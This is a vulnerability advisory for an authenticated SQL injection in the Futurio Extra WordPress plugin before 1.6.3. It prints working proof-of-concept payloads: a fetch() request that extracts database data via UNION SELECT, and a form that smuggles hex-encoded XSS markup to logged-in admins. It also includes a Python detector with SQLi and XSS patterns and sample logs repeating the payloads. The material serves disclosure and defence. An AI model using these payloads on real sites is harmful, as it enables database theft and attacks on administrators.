wpexploit
Jan w Oleju
WPEX-ID:36261AF9-3B34-4563-AF3C-C9E54AE2D581
Jan 04, 2022 - 12:00 a.m.

Futurio Extra < 1.6.3 - Authenticated SQL Injection


EPSS: 0.001 (Low), percentile 24.8%

The plugin is affected by a SQL Injection vulnerability that could be used by high-privilege users to extract data from the database, as well as to perform Cross-Site Scripting (XSS) against logged-in admins by making them open a malicious link.

Using SQLi to extract database variables:

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "dilaz_mb_query_select", "q": '" union select 0,1,2,3,4,@@version,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g', "query_args": "YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==", "query_type": "post"}),
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Using SQLi for XSS (works in Firefox, not in Chrome due to same-site behavior):

<form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
  <input type="text" name="action" value="dilaz_mb_query_select">
  <input type="text" name="q" value='" union select 0,1,2,3,4,0x3c696d6720737263206f6e6572726f723d616c6572742831293e,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g'>
  <input type="text" name="query_args" value="YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==">
  <input type="text" name="query_type" value="post">
  <input type="submit">
</form>
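A defender-side check for both variants above, added here as an example that is not part of the advisory or of the plugin's own code: it inspects POST bodies sent to admin-ajax.php for the dilaz_mb_query_select action and flags q values that break out of the search string or carry hex-encoded markup. The record shape (path plus raw body) and the sample records are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlencode

# The action name and parameters are the ones from the advisory's PoC; the log
# record shape (path + raw POST body) is an assumption made for this example.
SUSPECT_ACTION = "dilaz_mb_query_select"
SQLI_PATTERNS = {  # q breaking out of the intended search string
    "union": re.compile(r"[\"']\s*union\s+(all\s+)?select", re.I),
    "boolean": re.compile(r"[\"']\s*(or|and)\s+[\w\"']+\s*=", re.I),
    "comment": re.compile(r"--\s*\w*\s*$|/\*.*\*/"),
}
HEX_LITERAL = re.compile(r"0x[0-9a-f]{8,}", re.I)  # MySQL hex string, used to smuggle markup
HTML_TAG = re.compile(r"<\s*[a-z]+[^>]*>", re.I)

def inspect_request(record):
    """Return the reasons a request abuses dilaz_mb_query_select, or [] if it looks benign."""
    if not record.get("path", "").endswith("/wp-admin/admin-ajax.php"):
        return []
    params = parse_qs(record.get("body", ""), keep_blank_values=True)
    if params.get("action", [""])[0] != SUSPECT_ACTION:
        return []
    q = params.get("q", [""])[0]
    reasons = [f"sqli:{name}" for name, pat in SQLI_PATTERNS.items() if pat.search(q)]
    if HTML_TAG.search(q):
        reasons.append("xss:html-in-q")
    for m in HEX_LITERAL.finditer(q):  # decode 0x... literals and look for markup inside
        try:
            decoded = bytes.fromhex(m.group(0)[2:]).decode("utf-8", "replace")
        except ValueError:  # odd-length literal, not a valid hex string
            continue
        if HTML_TAG.search(decoded):
            reasons.append("xss:hex-encoded-html")
    return reasons

def scan(records):
    """(index, reasons) for every flagged record; benign ones are skipped."""
    return [(i, r) for i, r in ((i, inspect_request(rec)) for i, rec in enumerate(records)) if r]

# Constructed sample records (not from a real server): an ordinary search, the two
# payload shapes from the advisory, and an unrelated request.
SAMPLE_LOG = [
    {"path": "/wp-admin/admin-ajax.php", "body": urlencode({"action": SUSPECT_ACTION, "q": "hello world"})},
    {"path": "/wp-admin/admin-ajax.php", "body": urlencode({"action": SUSPECT_ACTION,
        "q": '" union select 0,1,2,3,4,@@version,6 -- g'})},
    {"path": "/wp-admin/admin-ajax.php", "body": urlencode({"action": SUSPECT_ACTION,
        "q": '" union select 0,0x3c696d6720737263206f6e6572726f723d616c6572742831293e -- g'})},
    {"path": "/wp-login.php", "body": "log=admin&pwd=x"},
]
```

Legitimate searches that happen to contain a quote followed by or/and will trip the boolean pattern, so tune the patterns against your own traffic before alerting on them.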
